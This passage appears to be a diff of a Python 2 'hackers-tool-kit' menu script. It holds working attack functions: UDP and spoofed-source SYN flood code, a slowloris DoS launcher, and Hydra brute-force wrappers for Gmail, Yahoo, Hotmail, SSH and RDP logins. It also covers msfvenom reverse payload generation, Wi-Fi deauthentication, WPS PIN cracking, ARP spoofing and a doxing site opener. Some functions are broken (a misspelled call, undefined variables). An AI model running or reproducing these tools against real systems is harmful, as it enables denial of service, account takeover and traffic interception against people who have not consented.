'\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def 